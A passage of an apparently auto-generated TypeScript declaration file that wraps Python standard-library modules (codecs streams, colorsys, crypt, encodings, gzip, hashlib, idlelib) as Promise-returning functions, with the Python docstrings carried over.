open for writing.\n\t * \n\t * The StreamWriter may use different error handling\n\t * schemes by providing the errors keyword argument. 
These\n\t * parameters are predefined:\n\t * \n\t * 'strict' - raise a ValueError (or a subclass)\n\t * 'ignore' - ignore the character and continue with the next\n\t * 'replace'- replace with a suitable replacement character\n\t * 'xmlcharrefreplace' - Replace with the appropriate XML\n\t * character reference.\n\t * 'backslashreplace' - Replace with backslashed escape\n\t * sequences.\n\t * 'namereplace' - Replace with \\N{...} escape sequences.\n\t * \n\t * The set of allowed parameter values can be extended via\n\t * register_error.\n\t * \n\t */\n\tfunction StreamWriter(stream, errors?): Promise<IStreamWriter>\n\tfunction StreamWriter$({ stream, errors }: { stream, errors?}): Promise<IStreamWriter>\n\tinterface IStreamWriter extends ICodec {\n\n\t\t/**\n\t\t * Writes the object's contents encoded to self.stream.\n\t\t * \n\t\t */\n\t\twrite(object): Promise<any>\n\t\twrite$({ object }): Promise<any>\n\n\t\t/**\n\t\t * Writes the concatenated list of strings to the stream\n\t\t * using .write().\n\t\t * \n\t\t */\n\t\twritelines(list): Promise<any>\n\t\twritelines$({ list }): Promise<any>\n\n\t\t/**\n\t\t * Resets the codec buffers used for keeping internal state.\n\t\t * \n\t\t * Calling this method should ensure that the data on the\n\t\t * output is put into a clean state, that allows appending\n\t\t * of new fresh data without having to rescan the whole\n\t\t * stream to recover state.\n\t\t * \n\t\t * \n\t\t */\n\t\treset(): Promise<any>\n\t\treset$($: {}): Promise<any>\n\t\tseek(offset, whence?): Promise<any>\n\t\tseek$({ offset, whence }: { offset, whence?}): Promise<any>\n\t}\n\n\t/**\n\t * Creates a StreamReader instance.\n\t * \n\t * stream must be a file-like object open for reading.\n\t * \n\t * The StreamReader may use different error handling\n\t * schemes by providing the errors keyword argument. These\n\t * parameters are predefined:\n\t * \n\t * 'strict' - raise a ValueError (or a subclass)\n\t * 'ignore' - ignore the character and continue with the next\n\t * 'replace'- replace with a suitable replacement character\n\t * 'backslashreplace' - Replace with backslashed escape sequences;\n\t * \n\t * The set of allowed parameter values can be extended via\n\t * register_error.\n\t * \n\t */\n\tfunction StreamReader(stream, errors?): Promise<IStreamReader>\n\tfunction StreamReader$({ stream, errors }: { stream, errors?}): Promise<IStreamReader>\n\tinterface IStreamReader extends ICodec {\n\t\tdecode(input, errors?): Promise<any>\n\t\tdecode$({ input, errors }: { input, errors?}): Promise<any>\n\n\t\t/**\n\t\t * Decodes data from the stream self.stream and returns the\n\t\t * resulting object.\n\t\t * \n\t\t * chars indicates the number of decoded code points or bytes to\n\t\t * return. read() will never return more data than requested,\n\t\t * but it might return less, if there is not enough available.\n\t\t * \n\t\t * size indicates the approximate maximum number of decoded\n\t\t * bytes or code points to read for decoding. The decoder\n\t\t * can modify this setting as appropriate. The default value\n\t\t * -1 indicates to read and decode as much as possible. 
size\n\t\t * is intended to prevent having to decode huge files in one\n\t\t * step.\n\t\t * \n\t\t * If firstline is true, and a UnicodeDecodeError happens\n\t\t * after the first line terminator in the input only the first line\n\t\t * will be returned, the rest of the input will be kept until the\n\t\t * next call to read().\n\t\t * \n\t\t * The method should use a greedy read strategy, meaning that\n\t\t * it should read as much data as is allowed within the\n\t\t * definition of the encoding and the given size, e.g. if\n\t\t * optional encoding endings or state markers are available\n\t\t * on the stream, these should be read too.\n\t\t * \n\t\t */\n\t\tread(size?, chars?, firstline?: boolean): Promise<any>\n\t\tread$({ size, chars, firstline }: { size?, chars?, firstline?}): Promise<any>\n\n\t\t/**\n\t\t * Read one line from the input stream and return the\n\t\t * decoded data.\n\t\t * \n\t\t * size, if given, is passed as size argument to the\n\t\t * read() method.\n\t\t * \n\t\t * \n\t\t */\n\t\treadline(size?, keepends?: boolean): Promise<any>\n\t\treadline$({ size, keepends }: { size?, keepends?}): Promise<any>\n\n\t\t/**\n\t\t * Read all lines available on the input stream\n\t\t * and return them as a list.\n\t\t * \n\t\t * Line breaks are implemented using the codec's decoder\n\t\t * method and are included in the list entries.\n\t\t * \n\t\t * sizehint, if given, is ignored since there is no efficient\n\t\t * way to finding the true end-of-line.\n\t\t * \n\t\t * \n\t\t */\n\t\treadlines(sizehint?, keepends?: boolean): Promise<any>\n\t\treadlines$({ sizehint, keepends }: { sizehint?, keepends?}): Promise<any>\n\n\t\t/**\n\t\t * Resets the codec buffers used for keeping internal state.\n\t\t * \n\t\t * Note that no stream repositioning should take place.\n\t\t * This method is primarily intended to be able to recover\n\t\t * from decoding errors.\n\t\t * \n\t\t * \n\t\t */\n\t\treset(): Promise<any>\n\t\treset$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set the input stream's current position.\n\t\t * \n\t\t * Resets the codec buffers used for keeping state.\n\t\t * \n\t\t */\n\t\tseek(offset, whence?): Promise<any>\n\t\tseek$({ offset, whence }: { offset, whence?}): Promise<any>\n\t\tcharbuffertype\n\t}\n\n\t/**\n\t * StreamReaderWriter instances allow wrapping streams which\n\t * work in both read and write modes.\n\t * \n\t * The design is such that one can use the factory functions\n\t * returned by the codec.lookup() function to construct the\n\t * instance.\n\t * \n\t * \n\t */\n\n\t/**\n\t * Creates a StreamReaderWriter instance.\n\t * \n\t * stream must be a Stream-like object.\n\t * \n\t * Reader, Writer must be factory functions or classes\n\t * providing the StreamReader, StreamWriter interface resp.\n\t * \n\t * Error handling is done in the same way as defined for the\n\t * StreamWriter/Readers.\n\t * \n\t * \n\t */\n\tfunction StreamReaderWriter(stream, Reader, Writer, errors?): Promise<IStreamReaderWriter>\n\tfunction StreamReaderWriter$({ stream, Reader, Writer, errors }: { stream, Reader, Writer, errors?}): Promise<IStreamReaderWriter>\n\tinterface IStreamReaderWriter {\n\t\tread(size?): Promise<any>\n\t\tread$({ size }: { size?}): Promise<any>\n\t\treadline(size?): Promise<any>\n\t\treadline$({ size }: { size?}): Promise<any>\n\t\treadlines(sizehint?): Promise<any>\n\t\treadlines$({ sizehint }: { sizehint?}): Promise<any>\n\t\twrite(data): Promise<any>\n\t\twrite$({ data }): Promise<any>\n\t\twritelines(list): Promise<any>\n\t\twritelines$({ list }): 
Promise<any>\n\t\treset(): Promise<any>\n\t\treset$($: {}): Promise<any>\n\t\tseek(offset, whence?): Promise<any>\n\t\tseek$({ offset, whence }: { offset, whence?}): Promise<any>\n\t\tencoding\n\t}\n\n\t/**\n\t * StreamRecoder instances translate data from one encoding to another.\n\t * \n\t * They use the complete set of APIs returned by the\n\t * codecs.lookup() function to implement their task.\n\t * \n\t * Data written to the StreamRecoder is first decoded into an\n\t * intermediate format (depending on the \"decode\" codec) and then\n\t * written to the underlying stream using an instance of the provided\n\t * Writer class.\n\t * \n\t * In the other direction, data is read from the underlying stream using\n\t * a Reader instance and then encoded and returned to the caller.\n\t * \n\t * \n\t */\n\n\t/**\n\t * Creates a StreamRecoder instance which implements a two-way\n\t * conversion: encode and decode work on the frontend (the\n\t * data visible to .read() and .write()) while Reader and Writer\n\t * work on the backend (the data in stream).\n\t * \n\t * You can use these objects to do transparent\n\t * transcodings from e.g. latin-1 to utf-8 and back.\n\t * \n\t * stream must be a file-like object.\n\t * \n\t * encode and decode must adhere to the Codec interface; Reader and\n\t * Writer must be factory functions or classes providing the\n\t * StreamReader and StreamWriter interfaces resp.\n\t * \n\t * Error handling is done in the same way as defined for the\n\t * StreamWriter/Readers.\n\t * \n\t * \n\t */\n\tfunction StreamRecoder(stream, encode, decode, Reader, Writer, errors?): Promise<IStreamRecoder>\n\tfunction StreamRecoder$({ stream, encode, decode, Reader, Writer, errors }: { stream, encode, decode, Reader, Writer, errors?}): Promise<IStreamRecoder>\n\tinterface IStreamRecoder {\n\t\tread(size?): Promise<any>\n\t\tread$({ size }: { size?}): Promise<any>\n\t\treadline(size?): Promise<any>\n\t\treadline$({ size }: { size?}): Promise<any>\n\t\treadlines(sizehint?): Promise<any>\n\t\treadlines$({ sizehint }: { sizehint?}): Promise<any>\n\t\twrite(data): Promise<any>\n\t\twrite$({ data }): Promise<any>\n\t\twritelines(list): Promise<any>\n\t\twritelines$({ list }): Promise<any>\n\t\treset(): Promise<any>\n\t\treset$($: {}): Promise<any>\n\t\tseek(offset, whence?): Promise<any>\n\t\tseek$({ offset, whence }: { offset, whence?}): Promise<any>\n\t\tdata_encoding\n\t\tfile_encoding\n\t}\n\tlet BOM_UTF8: Promise<any>\n\tlet BOM_LE: Promise<any>\n\tlet BOM_UTF16_LE: Promise<any>\n\tlet BOM_BE: Promise<any>\n\tlet BOM_UTF16_BE: Promise<any>\n\tlet BOM_UTF32_LE: Promise<any>\n\tlet BOM_UTF32_BE: Promise<any>\n\tlet BOM: Promise<any>\n\tlet BOM_UTF16: Promise<any>\n\tlet BOM_UTF32: Promise<any>\n\tlet BOM32_LE: Promise<any>\n\tlet BOM32_BE: Promise<any>\n\tlet BOM64_LE: Promise<any>\n\tlet BOM64_BE: Promise<any>\n\tlet strict_errors: Promise<any>\n\tlet ignore_errors: Promise<any>\n\tlet replace_errors: Promise<any>\n\tlet xmlcharrefreplace_errors: Promise<any>\n\tlet backslashreplace_errors: Promise<any>\n\tlet namereplace_errors: Promise<any>\n}\ndeclare module colorsys {\n\tvar _\n\tfunction rgb_to_yiq(r, g, b): Promise<any>\n\tfunction rgb_to_yiq$({ r, g, b }): Promise<any>\n\tfunction yiq_to_rgb(y, i, q): Promise<any>\n\tfunction yiq_to_rgb$({ y, i, q }): Promise<any>\n\tfunction rgb_to_hls(r, g, b): Promise<any>\n\tfunction rgb_to_hls$({ r, g, b }): Promise<any>\n\tfunction hls_to_rgb(h, l, s): Promise<any>\n\tfunction hls_to_rgb$({ h, l, s }): Promise<any>\n\tfunction rgb_to_hsv(r, 
g, b): Promise<any>\n\tfunction rgb_to_hsv$({ r, g, b }): Promise<any>\n\tfunction hsv_to_rgb(h, s, v): Promise<any>\n\tfunction hsv_to_rgb$({ h, s, v }): Promise<any>\n\tlet ONE_THIRD: Promise<any>\n\tlet ONE_SIXTH: Promise<any>\n\tlet TWO_THIRD: Promise<any>\n}\ndeclare module crypt {\n\tvar _\n\n\t/**\n\t * Generate a salt for the specified method.\n\t * \n\t * If not specified, the strongest available method will be used.\n\t * \n\t * \n\t */\n\tfunction mksalt(method?): Promise<any>\n\tfunction mksalt$({ method }: { method?}): Promise<any>\n\n\t/**\n\t * Return a string representing the one-way hash of a password, with a salt\n\t * prepended.\n\t * \n\t * If ``salt`` is not specified or is ``None``, the strongest\n\t * available method will be selected and a salt generated. Otherwise,\n\t * ``salt`` may be one of the ``crypt.METHOD_*`` values, or a string as\n\t * returned by ``crypt.mksalt()``.\n\t * \n\t * \n\t */\n\tfunction crypt(word, salt?): Promise<any>\n\tfunction crypt$({ word, salt }: { word, salt?}): Promise<any>\n\n\t/**\n\t * Class representing a salt method per the Modular Crypt Format or the\n\t * legacy 2-character crypt method.\n\t */\n\tinterface I_Method {\n\t}\n\tlet methods: Promise<any>\n}\ndeclare module decimal {\n\tvar _\n}\ndeclare module email {\n\tmodule base64mime {\n\t\tvar _\n\n\t\t/**\n\t\t * Return the length of s when it is encoded with base64.\n\t\t */\n\t\tfunction header_length(bytearray): Promise<any>\n\t\tfunction header_length$({ bytearray }): Promise<any>\n\n\t\t/**\n\t\t * Encode a single header line with Base64 encoding in a given charset.\n\t\t * \n\t\t * charset names the character set to use to encode the header. It defaults\n\t\t * to iso-8859-1. Base64 encoding is defined in RFC 2045.\n\t\t * \n\t\t */\n\t\tfunction header_encode(header_bytes, charset?): Promise<any>\n\t\tfunction header_encode$({ header_bytes, charset }: { header_bytes, charset?}): Promise<any>\n\n\t\t/**\n\t\t * Encode a string with base64.\n\t\t * \n\t\t * Each line will be wrapped at, at most, maxlinelen characters (defaults to\n\t\t * 76 characters).\n\t\t * \n\t\t * Each line of encoded text will end with eol, which defaults to \"\\n\". 
Set\n\t\t * this to \"\\r\\n\" if you will be using the result of this function directly\n\t\t * in an email.\n\t\t * \n\t\t */\n\t\tfunction body_encode(s, maxlinelen?, eol?): Promise<any>\n\t\tfunction body_encode$({ s, maxlinelen, eol }: { s, maxlinelen?, eol?}): Promise<any>\n\n\t\t/**\n\t\t * Decode a raw base64 string, returning a bytes object.\n\t\t * \n\t\t * This function does not parse a full MIME header value encoded with\n\t\t * base64 (like =?iso-8859-1?b?bmloISBuaWgh?=) -- please use the high\n\t\t * level email.header class for that functionality.\n\t\t * \n\t\t */\n\t\tfunction decode(string): Promise<any>\n\t\tfunction decode$({ string }): Promise<any>\n\t\tlet CRLF: Promise<any>\n\t\tlet NL: Promise<any>\n\t\tlet EMPTYSTRING: Promise<any>\n\t\tlet MISC_LEN: Promise<any>\n\t\tlet body_decode: Promise<any>\n\t\tlet decodestring: Promise<any>\n\t}\n}\ndeclare module encodings {\n\tmodule base64_codec {\n\t\tvar _\n\t\tfunction base64_encode(input, errors?): Promise<any>\n\t\tfunction base64_encode$({ input, errors }: { input, errors?}): Promise<any>\n\t\tfunction base64_decode(input, errors?): Promise<any>\n\t\tfunction base64_decode$({ input, errors }: { input, errors?}): Promise<any>\n\t\tfunction getregentry(): Promise<any>\n\t\tfunction getregentry$($: {}): Promise<any>\n\t\tinterface ICodec {\n\t\t\tencode(input, errors?): Promise<any>\n\t\t\tencode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t\tdecode(input, errors?): Promise<any>\n\t\t\tdecode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t}\n\t\tinterface IIncrementalEncoder {\n\t\t\tencode(input, final?: boolean): Promise<any>\n\t\t\tencode$({ input, final }: { input, final?}): Promise<any>\n\t\t}\n\t\tinterface IIncrementalDecoder {\n\t\t\tdecode(input, final?: boolean): Promise<any>\n\t\t\tdecode$({ input, final }: { input, final?}): Promise<any>\n\t\t}\n\t\tinterface IStreamWriter extends ICodec {\n\t\t\tcharbuffertype\n\t\t}\n\t\tinterface IStreamReader extends ICodec {\n\t\t}\n\t}\n\tmodule bz2_codec {\n\t\tvar _\n\t\tfunction bz2_encode(input, errors?): Promise<any>\n\t\tfunction bz2_encode$({ input, errors }: { input, errors?}): Promise<any>\n\t\tfunction bz2_decode(input, errors?): Promise<any>\n\t\tfunction bz2_decode$({ input, errors }: { input, errors?}): Promise<any>\n\t\tfunction getregentry(): Promise<any>\n\t\tfunction getregentry$($: {}): Promise<any>\n\t\tinterface ICodec {\n\t\t\tencode(input, errors?): Promise<any>\n\t\t\tencode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t\tdecode(input, errors?): Promise<any>\n\t\t\tdecode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t}\n\t\tfunction IncrementalEncoder(errors?): Promise<IIncrementalEncoder>\n\t\tfunction IncrementalEncoder$({ errors }: { errors?}): Promise<IIncrementalEncoder>\n\t\tinterface IIncrementalEncoder {\n\t\t\tencode(input, final?: boolean): Promise<any>\n\t\t\tencode$({ input, final }: { input, final?}): Promise<any>\n\t\t\treset(): Promise<any>\n\t\t\treset$($: {}): Promise<any>\n\t\t}\n\t\tfunction IncrementalDecoder(errors?): Promise<IIncrementalDecoder>\n\t\tfunction IncrementalDecoder$({ errors }: { errors?}): Promise<IIncrementalDecoder>\n\t\tinterface IIncrementalDecoder {\n\t\t\tdecode(input, final?: boolean): Promise<any>\n\t\t\tdecode$({ input, final }: { input, final?}): Promise<any>\n\t\t\treset(): Promise<any>\n\t\t\treset$($: {}): Promise<any>\n\t\t}\n\t\tinterface IStreamWriter extends ICodec {\n\t\t\tcharbuffertype\n\t\t}\n\t\tinterface IStreamReader extends ICodec 
{\n\t\t}\n\t}\n\tmodule hex_codec {\n\t\tvar _\n\t\tfunction hex_encode(input, errors?): Promise<any>\n\t\tfunction hex_encode$({ input, errors }: { input, errors?}): Promise<any>\n\t\tfunction hex_decode(input, errors?): Promise<any>\n\t\tfunction hex_decode$({ input, errors }: { input, errors?}): Promise<any>\n\t\tfunction getregentry(): Promise<any>\n\t\tfunction getregentry$($: {}): Promise<any>\n\t\tinterface ICodec {\n\t\t\tencode(input, errors?): Promise<any>\n\t\t\tencode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t\tdecode(input, errors?): Promise<any>\n\t\t\tdecode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t}\n\t\tinterface IIncrementalEncoder {\n\t\t\tencode(input, final?: boolean): Promise<any>\n\t\t\tencode$({ input, final }: { input, final?}): Promise<any>\n\t\t}\n\t\tinterface IIncrementalDecoder {\n\t\t\tdecode(input, final?: boolean): Promise<any>\n\t\t\tdecode$({ input, final }: { input, final?}): Promise<any>\n\t\t}\n\t\tinterface IStreamWriter extends ICodec {\n\t\t\tcharbuffertype\n\t\t}\n\t\tinterface IStreamReader extends ICodec {\n\t\t}\n\t}\n\tmodule palmos {\n\t\tvar _\n\t\tfunction getregentry(): Promise<any>\n\t\tfunction getregentry$($: {}): Promise<any>\n\t\tinterface ICodec {\n\t\t\tencode(input, errors?): Promise<any>\n\t\t\tencode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t\tdecode(input, errors?): Promise<any>\n\t\t\tdecode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t}\n\t\tinterface IIncrementalEncoder {\n\t\t\tencode(input, final?: boolean): Promise<any>\n\t\t\tencode$({ input, final }: { input, final?}): Promise<any>\n\t\t}\n\t\tinterface IIncrementalDecoder {\n\t\t\tdecode(input, final?: boolean): Promise<any>\n\t\t\tdecode$({ input, final }: { input, final?}): Promise<any>\n\t\t}\n\t\tinterface IStreamWriter extends ICodec {\n\t\t}\n\t\tinterface IStreamReader extends ICodec {\n\t\t}\n\t\tlet decoding_table: Promise<any>\n\t\tlet encoding_table: Promise<any>\n\t}\n\tmodule quopri_codec {\n\t\tvar _\n\t\tfunction quopri_encode(input, errors?): Promise<any>\n\t\tfunction quopri_encode$({ input, errors }: { input, errors?}): Promise<any>\n\t\tfunction quopri_decode(input, errors?): Promise<any>\n\t\tfunction quopri_decode$({ input, errors }: { input, errors?}): Promise<any>\n\t\tfunction getregentry(): Promise<any>\n\t\tfunction getregentry$($: {}): Promise<any>\n\t\tinterface ICodec {\n\t\t\tencode(input, errors?): Promise<any>\n\t\t\tencode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t\tdecode(input, errors?): Promise<any>\n\t\t\tdecode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t}\n\t\tinterface IIncrementalEncoder {\n\t\t\tencode(input, final?: boolean): Promise<any>\n\t\t\tencode$({ input, final }: { input, final?}): Promise<any>\n\t\t}\n\t\tinterface IIncrementalDecoder {\n\t\t\tdecode(input, final?: boolean): Promise<any>\n\t\t\tdecode$({ input, final }: { input, final?}): Promise<any>\n\t\t}\n\t\tinterface IStreamWriter extends ICodec {\n\t\t\tcharbuffertype\n\t\t}\n\t\tinterface IStreamReader extends ICodec {\n\t\t}\n\t}\n\tmodule uu_codec {\n\t\tvar _\n\t\tfunction uu_encode(input, errors?, filename?, mode?): Promise<any>\n\t\tfunction uu_encode$({ input, errors, filename, mode }: { input, errors?, filename?, mode?}): Promise<any>\n\t\tfunction uu_decode(input, errors?): Promise<any>\n\t\tfunction uu_decode$({ input, errors }: { input, errors?}): Promise<any>\n\t\tfunction getregentry(): Promise<any>\n\t\tfunction getregentry$($: {}): 
Promise<any>\n\t\tinterface ICodec {\n\t\t\tencode(input, errors?): Promise<any>\n\t\t\tencode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t\tdecode(input, errors?): Promise<any>\n\t\t\tdecode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t}\n\t\tinterface IIncrementalEncoder {\n\t\t\tencode(input, final?: boolean): Promise<any>\n\t\t\tencode$({ input, final }: { input, final?}): Promise<any>\n\t\t}\n\t\tinterface IIncrementalDecoder {\n\t\t\tdecode(input, final?: boolean): Promise<any>\n\t\t\tdecode$({ input, final }: { input, final?}): Promise<any>\n\t\t}\n\t\tinterface IStreamWriter extends ICodec {\n\t\t\tcharbuffertype\n\t\t}\n\t\tinterface IStreamReader extends ICodec {\n\t\t}\n\t}\n\tmodule zlib_codec {\n\t\tvar _\n\t\tfunction zlib_encode(input, errors?): Promise<any>\n\t\tfunction zlib_encode$({ input, errors }: { input, errors?}): Promise<any>\n\t\tfunction zlib_decode(input, errors?): Promise<any>\n\t\tfunction zlib_decode$({ input, errors }: { input, errors?}): Promise<any>\n\t\tfunction getregentry(): Promise<any>\n\t\tfunction getregentry$($: {}): Promise<any>\n\t\tinterface ICodec {\n\t\t\tencode(input, errors?): Promise<any>\n\t\t\tencode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t\tdecode(input, errors?): Promise<any>\n\t\t\tdecode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t}\n\t\tfunction IncrementalEncoder(errors?): Promise<IIncrementalEncoder>\n\t\tfunction IncrementalEncoder$({ errors }: { errors?}): Promise<IIncrementalEncoder>\n\t\tinterface IIncrementalEncoder {\n\t\t\tencode(input, final?: boolean): Promise<any>\n\t\t\tencode$({ input, final }: { input, final?}): Promise<any>\n\t\t\treset(): Promise<any>\n\t\t\treset$($: {}): Promise<any>\n\t\t}\n\t\tfunction IncrementalDecoder(errors?): Promise<IIncrementalDecoder>\n\t\tfunction IncrementalDecoder$({ errors }: { errors?}): Promise<IIncrementalDecoder>\n\t\tinterface IIncrementalDecoder {\n\t\t\tdecode(input, final?: boolean): Promise<any>\n\t\t\tdecode$({ input, final }: { input, final?}): Promise<any>\n\t\t\treset(): Promise<any>\n\t\t\treset$($: {}): Promise<any>\n\t\t}\n\t\tinterface IStreamWriter extends ICodec {\n\t\t\tcharbuffertype\n\t\t}\n\t\tinterface IStreamReader extends ICodec {\n\t\t}\n\t}\n}\ndeclare module export {\n\tvar _\n\tfunction export_json(tree, pretty_print ?: boolean): Promise < any >\n\tfunction export_json$({ tree, pretty_print }: { tree, pretty_print?}): Promise<any>\n\tfunction export_dict(tree): Promise<any>\nfunction export_dict$({ tree }): Promise<any>\ninterface IDictExportVisitor {\n\tvisit(node): Promise<any>\n\tvisit$({ node }): Promise<any>\n\tdefault_visit(node): Promise<any>\n\tdefault_visit$({ node }): Promise<any>\n\tdefault_visit_field(val): Promise<any>\n\tdefault_visit_field$({ val }): Promise<any>\n\tvisit_str(val): Promise<any>\n\tvisit_str$({ val }): Promise<any>\n\tvisit_Bytes(val): Promise<any>\n\tvisit_Bytes$({ val }): Promise<any>\n\tvisit_NoneType(val): Promise<any>\n\tvisit_NoneType$({ val }): Promise<any>\n\tvisit_field_NameConstant_value(val): Promise<any>\n\tvisit_field_NameConstant_value$({ val }): Promise<any>\n\tvisit_field_Num_n(val): Promise<any>\n\tvisit_field_Num_n$({ val }): Promise<any>\n\tast_type_field\n}\n}\ndeclare module gzip {\n\tvar _\n\n\t/**\n\t * Open a gzip-compressed file in binary or text mode.\n\t * \n\t * The filename argument can be an actual filename (a str or bytes object), or\n\t * an existing file object to read from or write to.\n\t * \n\t * The mode argument can be \"r\", 
\"rb\", \"w\", \"wb\", \"x\", \"xb\", \"a\" or \"ab\" for\n\t * binary mode, or \"rt\", \"wt\", \"xt\" or \"at\" for text mode. The default mode is\n\t * \"rb\", and the default compresslevel is 9.\n\t * \n\t * For binary mode, this function is equivalent to the GzipFile constructor:\n\t * GzipFile(filename, mode, compresslevel). In this case, the encoding, errors\n\t * and newline arguments must not be provided.\n\t * \n\t * For text mode, a GzipFile object is created, and wrapped in an\n\t * io.TextIOWrapper instance with the specified encoding, error handling\n\t * behavior, and line ending(s).\n\t * \n\t * \n\t */\n\tfunction open(filename, mode?, compresslevel?, encoding?, errors?, newline?): Promise<any>\n\tfunction open$({ filename, mode, compresslevel, encoding, errors, newline }: { filename, mode?, compresslevel?, encoding?, errors?, newline?}): Promise<any>\n\tfunction write32u(output, value): Promise<any>\n\tfunction write32u$({ output, value }): Promise<any>\n\n\t/**\n\t * Compress data in one shot and return the compressed string.\n\t * Optional argument is the compression level, in range of 0-9.\n\t * \n\t */\n\tfunction compress(data, compresslevel?): Promise<any>\n\tfunction compress$({ data, compresslevel }: { data, compresslevel?}): Promise<any>\n\n\t/**\n\t * Decompress a gzip compressed string in one shot.\n\t * Return the decompressed string.\n\t * \n\t */\n\tfunction decompress(data): Promise<any>\n\tfunction decompress$({ data }): Promise<any>\n\tfunction main(): Promise<any>\n\tfunction main$($: {}): Promise<any>\n\n\t/**\n\t * Minimal read-only file object that prepends a string to the contents\n\t * of an actual file. Shouldn't be used outside of gzip.py, as it lacks\n\t * essential functionality.\n\t */\n\tinterface I_PaddedFile {\n\t\tread(size): Promise<any>\n\t\tread$({ size }): Promise<any>\n\t\tprepend(prepend?): Promise<any>\n\t\tprepend$({ prepend }: { prepend?}): Promise<any>\n\t\tseek(off): Promise<any>\n\t\tseek$({ off }): Promise<any>\n\t\tseekable(): Promise<any>\n\t\tseekable$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Exception raised in some cases for invalid gzip files.\n\t */\n\tinterface IBadGzipFile {\n\t}\n\n\t/**\n\t * The GzipFile class simulates most of the methods of a file object with\n\t * the exception of the truncate() method.\n\t * \n\t * This class only supports opening files in binary mode. If you need to open a\n\t * compressed file in text mode, use the gzip.open() function.\n\t * \n\t * \n\t */\n\n\t/**\n\t * Constructor for the GzipFile class.\n\t * \n\t * At least one of fileobj and filename must be given a\n\t * non-trivial value.\n\t * \n\t * The new class instance is based on fileobj, which can be a regular\n\t * file, an io.BytesIO object, or any other object which simulates a file.\n\t * It defaults to None, in which case filename is opened to provide\n\t * a file object.\n\t * \n\t * When fileobj is not None, the filename argument is only used to be\n\t * included in the gzip file header, which may include the original\n\t * filename of the uncompressed file. It defaults to the filename of\n\t * fileobj, if discernible; otherwise, it defaults to the empty string,\n\t * and in this case the original filename is not included in the header.\n\t * \n\t * The mode argument can be any of 'r', 'rb', 'a', 'ab', 'w', 'wb', 'x', or\n\t * 'xb' depending on whether the file will be read or written. 
The default\n\t * is the mode of fileobj if discernible; otherwise, the default is 'rb'.\n\t * A mode of 'r' is equivalent to one of 'rb', and similarly for 'w' and\n\t * 'wb', 'a' and 'ab', and 'x' and 'xb'.\n\t * \n\t * The compresslevel argument is an integer from 0 to 9 controlling the\n\t * level of compression; 1 is fastest and produces the least compression,\n\t * and 9 is slowest and produces the most compression. 0 is no compression\n\t * at all. The default is 9.\n\t * \n\t * The mtime argument is an optional numeric timestamp to be written\n\t * to the last modification time field in the stream when compressing.\n\t * If omitted or None, the current time is used.\n\t * \n\t * \n\t */\n\tfunction GzipFile(filename?, mode?, compresslevel?, fileobj?, mtime?): Promise<IGzipFile>\n\tfunction GzipFile$({ filename, mode, compresslevel, fileobj, mtime }: { filename?, mode?, compresslevel?, fileobj?, mtime?}): Promise<IGzipFile>\n\tinterface IGzipFile {\n\t\tfilename(): Promise<any>\n\t\tfilename$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Last modification time read from stream, or None\n\t\t */\n\t\tmtime(): Promise<any>\n\t\tmtime$($: {}): Promise<any>\n\t\twrite(data): Promise<any>\n\t\twrite$({ data }): Promise<any>\n\t\tread(size?): Promise<any>\n\t\tread$({ size }: { size?}): Promise<any>\n\n\t\t/**\n\t\t * Implements BufferedIOBase.read1()\n\t\t * \n\t\t * Reads up to a buffer's worth of data if size is negative.\n\t\t */\n\t\tread1(size?): Promise<any>\n\t\tread1$({ size }: { size?}): Promise<any>\n\t\tpeek(n): Promise<any>\n\t\tpeek$({ n }): Promise<any>\n\t\tclosed(): Promise<any>\n\t\tclosed$($: {}): Promise<any>\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t\tflush(zlib_mode?): Promise<any>\n\t\tflush$({ zlib_mode }: { zlib_mode?}): Promise<any>\n\n\t\t/**\n\t\t * Invoke the underlying file object's fileno() method.\n\t\t * \n\t\t * This will raise AttributeError if the underlying file object\n\t\t * doesn't support fileno().\n\t\t * \n\t\t */\n\t\tfileno(): Promise<any>\n\t\tfileno$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the uncompressed stream file position indicator to the\n\t\t * beginning of the file\n\t\t */\n\t\trewind(): Promise<any>\n\t\trewind$($: {}): Promise<any>\n\t\treadable(): Promise<any>\n\t\treadable$($: {}): Promise<any>\n\t\twritable(): Promise<any>\n\t\twritable$($: {}): Promise<any>\n\t\tseekable(): Promise<any>\n\t\tseekable$($: {}): Promise<any>\n\t\tseek(offset, whence?): Promise<any>\n\t\tseek$({ offset, whence }: { offset, whence?}): Promise<any>\n\t\treadline(size?): Promise<any>\n\t\treadline$({ size }: { size?}): Promise<any>\n\t\tmyfileobj\n\t}\n\tinterface I_GzipReader {\n\t\tread(size?): Promise<any>\n\t\tread$({ size }: { size?}): Promise<any>\n\t}\n}\ndeclare module hashlib {\n\tvar _\n\tlet algorithms_guaranteed: Promise<any>\n\tlet algorithms_available: Promise<any>\n\tlet new$: Promise<any>\n}\ndeclare module idlelib {\n\tmodule codecontext {\n\t\tvar _\n\n\t\t/**\n\t\t * Extract the beginning whitespace and first word from codeline.\n\t\t */\n\t\tfunction get_spaces_firstword(codeline, c?): Promise<any>\n\t\tfunction get_spaces_firstword$({ codeline, c }: { codeline, c?}): Promise<any>\n\n\t\t/**\n\t\t * Return tuple of (line indent value, codeline, block start keyword).\n\t\t * \n\t\t * The indentation of empty lines (or comment lines) is INFINITY.\n\t\t * If the line does not start a block, the keyword value is False.\n\t\t * \n\t\t */\n\t\tfunction get_line_info(codeline): Promise<any>\n\t\tfunction 
